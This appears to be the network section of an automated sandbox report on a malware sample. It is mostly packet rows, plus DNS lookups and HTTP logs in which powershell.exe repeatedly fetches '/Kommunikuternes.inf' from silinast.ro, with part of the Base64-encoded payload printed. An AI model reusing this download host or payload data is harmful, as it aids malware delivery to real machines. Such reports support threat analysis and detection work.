                        Oct 8, 2024 10:59:47.917068958 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.917094946 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.917095900 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.917100906 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.917134047 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.917144060 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.917165041 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.917197943 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.917205095 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.917228937 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.917262077 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.917268038 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.917293072 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.917325020 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.917332888 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.917360067 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.917402029 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.942635059 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.942718029 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.942764997 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.942770004 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.942802906 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.942851067 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.942856073 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.942892075 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.942924976 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.942933083 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.942958117 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.942991018 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.942996979 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.943039894 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943073034 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943077087 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.943104982 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943137884 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943140030 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.943173885 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943213940 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.943222046 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943252087 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943286896 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.943290949 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943324089 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943356037 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943358898 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.943408966 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943444967 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943455935 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.943494081 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943527937 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943532944 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.943577051 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943608999 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943614960 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.943662882 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943695068 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943705082 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.943726063 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943758965 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943764925 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.943789959 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943821907 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943828106 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.943851948 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943886995 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943888903 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.943917990 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943952084 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.943954945 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.943981886 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.944013119 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.944024086 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.944044113 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.944077015 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.944086075 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.944108009 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.944139957 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.944144964 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.944188118 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.944226027 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.944236040 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.944267035 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.944298983 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.944308996 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.944325924 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.944360018 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.944365025 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.944391966 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.944422960 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.944434881 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.944454908 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.944485903 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.944500923 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.944519997 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.944560051 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.946012974 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.946044922 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.946079016 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.946083069 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.946127892 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.946161032 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.946172953 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.946193933 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.946227074 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.946233034 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.946893930 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.946933985 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.946947098 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.946981907 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947020054 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.947060108 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947092056 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947124004 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947130919 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.947171926 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947202921 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947208881 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.947236061 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947268963 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947278976 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.947313070 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947345018 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947348118 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.947458029 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947490931 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947499037 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.947540045 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947572947 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947582960 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.947603941 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947639942 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.947653055 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947685003 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947716951 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947721004 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.947766066 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947798014 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947803974 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.947829008 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947860956 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947865009 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.947907925 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947942972 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.947946072 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.947973967 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.948000908 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.948010921 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.948031902 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.948064089 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.948065996 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.948091984 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.948123932 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.948126078 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.948156118 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.948188066 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.948193073 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.948220015 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.948251009 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.948256969 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.967772007 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.967833042 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.967843056 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.967879057 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.967912912 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.967947960 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.967955112 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.967981100 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.967992067 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.968013048 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.968044996 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.968055010 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:47.968076944 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.968111038 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:47.968116045 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:48.004754066 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:48.004798889 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:48.004832983 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:48.004857063 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:48.004892111 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:48.004897118 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:48.004924059 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:48.004959106 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:48.004961014 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:48.004991055 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:48.005023956 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:48.005026102 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:48.005055904 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:48.005089045 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:48.005093098 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:48.005120993 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:48.005153894 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:48.005156040 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:48.005184889 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:48.005220890 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:48.005222082 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:48.029964924 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:48.030035019 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:48.030159950 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:48.030190945 CEST8049757188.241.183.45192.168.2.4
                        Oct 8, 2024 10:59:48.030230999 CEST4975780192.168.2.4188.241.183.45
                        Oct 8, 2024 10:59:52.589222908 CEST4975780192.168.2.4188.241.183.45

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 8, 2024 10:59:18.046071053 CEST5009853192.168.2.41.1.1.1
                        Oct 8, 2024 10:59:18.962591887 CEST53500981.1.1.1192.168.2.4
                        Oct 8, 2024 10:59:21.851044893 CEST6129153192.168.2.41.1.1.1
                        Oct 8, 2024 10:59:21.931741953 CEST53612911.1.1.1192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Oct 8, 2024 10:59:18.046071053 CEST192.168.2.41.1.1.10x15f2Standard query (0)6777.6777.6777.677eA (IP address)IN (0x0001)false
                        Oct 8, 2024 10:59:21.851044893 CEST192.168.2.41.1.1.10xa03bStandard query (0)silinast.roA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Oct 8, 2024 10:59:18.962591887 CEST1.1.1.1192.168.2.40x15f2Name error (3)6777.6777.6777.677enonenoneA (IP address)IN (0x0001)false
                        Oct 8, 2024 10:59:21.931741953 CEST1.1.1.1192.168.2.40xa03bNo error (0)silinast.ro188.241.183.45A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • silinast.ro

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.449737188.241.183.45807468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Oct 8, 2024 10:59:21.941854954 CEST174OUTGET /Kommunikuternes.inf HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.449738188.241.183.45807468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Oct 8, 2024 10:59:21.964584112 CEST174OUTGET /Kommunikuternes.inf HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.449739188.241.183.45807468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Oct 8, 2024 10:59:26.551490068 CEST80OUTGET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.449740188.241.183.45807468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Oct 8, 2024 10:59:26.562544107 CEST80OUTGET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.449741188.241.183.45807468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Oct 8, 2024 10:59:30.618431091 CEST80OUTGET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.449742188.241.183.45807468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Oct 8, 2024 10:59:30.630270004 CEST80OUTGET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.449751188.241.183.45807468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Oct 8, 2024 10:59:34.632853985 CEST80OUTGET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.449752188.241.183.45807468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Oct 8, 2024 10:59:34.643678904 CEST80OUTGET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.449753188.241.183.45807468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Oct 8, 2024 10:59:38.649478912 CEST80OUTGET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.449754188.241.183.45807468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Oct 8, 2024 10:59:38.662472963 CEST80OUTGET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        10192.168.2.449755188.241.183.45807468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Oct 8, 2024 10:59:42.694840908 CEST80OUTGET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        11192.168.2.449756188.241.183.45807468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Oct 8, 2024 10:59:42.708072901 CEST80OUTGET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        12192.168.2.449757188.241.183.45807468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampBytes transferredDirectionData
                        Oct 8, 2024 10:59:46.726690054 CEST80OUTGET /Kommunikuternes.inf HTTP/1.1
                        Host: silinast.ro
                        Connection: Keep-Alive
                        Oct 8, 2024 10:59:47.403297901 CEST1236INHTTP/1.1 200 OK
                        Date: Tue, 08 Oct 2024 08:59:47 GMT
                        Server: Apache
                        Upgrade: h2,h2c
                        Connection: Upgrade, Keep-Alive
                        Last-Modified: Mon, 07 Oct 2024 05:14:42 GMT
                        Accept-Ranges: bytes
                        Content-Length: 482184
                        Keep-Alive: timeout=5, max=100
                        Data Raw: 36 77 49 72 4a 33 45 42 6d 37 75 68 57 52 49 41 36 77 49 37 55 6e 45 42 6d 77 4e 63 4a 41 54 72 41 72 41 64 36 77 49 56 53 37 6e 71 74 65 31 4b 36 77 4c 50 46 75 73 43 50 64 57 42 77 65 43 5a 44 41 4e 78 41 5a 76 72 41 69 76 6e 67 66 48 4b 54 2f 70 4e 36 77 49 37 43 58 45 42 6d 2b 73 43 4f 57 70 78 41 5a 75 36 43 6d 59 68 72 2b 73 43 54 4f 52 78 41 5a 76 72 41 73 2b 58 36 77 4c 42 6a 7a 48 4b 36 77 4a 2b 4f 33 45 42 6d 34 6b 55 43 33 45 42 6d 33 45 42 6d 39 48 69 63 51 47 62 36 77 4b 57 78 6f 50 42 42 4f 73 43 75 6b 76 72 41 68 33 30 67 66 6b 66 4b 55 45 43 66 4d 70 78 41 5a 76 72 41 69 2b 6f 69 30 51 6b 42 4f 73 43 4c 4b 52 78 41 5a 75 4a 77 2b 73 43 46 68 37 72 41 6d 73 4e 67 63 4d 46 57 39 6b 41 63 51 47 62 63 51 47 62 75 67 56 31 48 77 58 72 41 6d 71 75 36 77 49 31 76 34 48 43 54 4e 64 31 76 75 73 43 4c 58 74 78 41 5a 75 42 38 6c 46 4d 6c 63 4e 78 41 5a 74 78 41 5a 76 72 41 6f 78 63 63 51 47 62 36 77 4a 66 6f 2b 73 43 47 36 6d 4c 44 42 44 72 41 67 33 33 36 77 49 63 37 49 6b 4d 45 2b 73 43 63 74 [TRUNCATED]
                        Data Ascii: 6wIrJ3EBm7uhWRIA6wI7UnEBmwNcJATrArAd6wIVS7nqte1K6wLPFusCPdWBweCZDANxAZvrAivngfHKT/pN6wI7CXEBm+sCOWpxAZu6CmYhr+sCTORxAZvrAs+X6wLBjzHK6wJ+O3EBm4kUC3EBm3EBm9HicQGb6wKWxoPBBOsCukvrAh30gfkfKUECfMpxAZvrAi+oi0QkBOsCLKRxAZuJw+sCFh7rAmsNgcMFW9kAcQGbcQGbugV1HwXrAmqu6wI1v4HCTNd1vusCLXtxAZuB8lFMlcNxAZtxAZvrAoxccQGb6wJfo+sCG6mLDBDrAg336wIc7IkME+sCctdxAZtCcQGbcQGbgfpo/QQAddTrApxqcQGbiVwkDOsCpyjrAqKQge0AAwAA6wLJ33EBm4tUJAhxAZtxAZuLfCQEcQGbcQGbievrAocJ6wKAb4HDnAAAAHEBm+sC58BT6wJs8usCO6dqQHEBm+sCOc+J63EBm3EBm8eDAAEAAACQVgJxAZtxAZuBwwABAABxAZtxAZtTcQGbcQGbievrAjr6cQGbibsEAQAAcQGbcQGbgcMEAQAA6wIuIOsCojdTcQGb6wI++mr/cQGb6wKTIIPCBXEBm3EBmzH26wI88XEBmzHJ6wJ1rOsCQauLGusC63NxAZtBcQGb6wLUtTkcCnXzcQGbcQGbRnEBm3EBm4B8Cvu4dd/rArvVcQGbi0QK/OsCaW9xAZsp8OsCvW/rAuc1/9JxAZvrAhXQumj9BABxAZtxAZsxwOsCHyBxAZuLfCQMcQGb6wLKvoE0B5KcTJVxAZtxAZuDwATrAqdC6wJzWTnQdeRxAZtxAZuJ+3EBm+sCV9L/1+sC3J1xAZt6nEyVksd0Txt5zXnjQ4icE1g9SVaVGRx3JRu9HTjNZMJRT4UTbSb1gKnNZOcZ0hRV2EGVo39ncRdGzeGfnExwkoZ0ehPoQZWEoHgmE/BBlbWmU9hVGfSUkpw1rW
                        Oct 8, 2024 10:59:47.403347015 CEST224INData Raw: 6c 31 7a 53 41 71 6e 55 79 56 46 4b 31 6b 4a 68 4d 5a 39 4a 53 53 6e 45 39 33 76 44 4c 4e 45 43 71 64 54 4a 57 54 69 4c 4a 6a 71 31 34 4e 61 68 38 6b 54 5a 57 53 36 62 6e 55 77 43 5a 45 6c 5a 4b 63 7a 57 2b 52 69 7a 72 39 6e 52 50 4a 66 4a 61 63
                        Data Ascii: l1zSAqnUyVFK1kJhMZ9JSSnE93vDLNECqdTJWTiLJjq14Nah8kTZWS6bnUwCZElZKczW+Rizr9nRPJfJacFhwnNU2VkhiPKw2FWwGqT81jZvdRuRNyh55CLM1TSgaJbfQdtTgbpb0eJzVNlZKTyfRtY7MQUhizEFgdMeUt1kyVnRHtf5acxRDqnUyVE2dDKAW5z36X+nVUGwEAlJKczejujNuVkpPBBT
                        Oct 8, 2024 10:59:47.403382063 CEST1236INData Raw: 61 63 54 4d 62 30 47 59 55 55 62 4f 50 4d 6c 4a 74 30 55 47 65 57 6e 4d 58 51 31 6d 71 4c 71 58 75 4c 34 35 47 53 45 38 6e 78 6b 35 78 4d 2f 63 4b 6a 4c 37 63 58 56 71 54 32 4a 5a 68 4d 45 46 4d 56 45 59 6b 71 67 63 67 44 4e 4c 46 55 73 6d 68 54
                        Data Ascii: acTMb0GYUUbOPMlJt0UGeWnMXQ1mqLqXuL45GSE8nxk5xM/cKjL7cXVqT2JZhMEFMVEYkqgcgDNLFUsmhTeXzDbP6gR5Ug8RZzKqxYpZ8e34D20Wj3xX1bMEiVG9lkY1D+x9iO+nVEKEENont0/zmWnMUQWpxMlXtYoJGSGIysUMTFIMWeTJUbWs1qiSzS3sQX+cKQnEwU7+ys/ZKcQxFJdUiV+J0qEEtj+V2SnEx99XRIlRZNd
                        Oct 8, 2024 10:59:47.403445959 CEST1236INData Raw: 47 53 46 66 6c 6e 6b 35 78 4d 77 79 7a 4d 59 7a 37 35 48 62 70 4d 42 39 36 4c 46 48 77 30 45 35 42 78 48 61 4a 30 79 33 69 46 78 77 34 56 72 70 79 67 41 53 6f 51 58 65 35 50 2f 48 6a 49 54 4e 68 63 61 47 42 34 54 47 61 4a 74 4f 76 30 52 5a 44 50
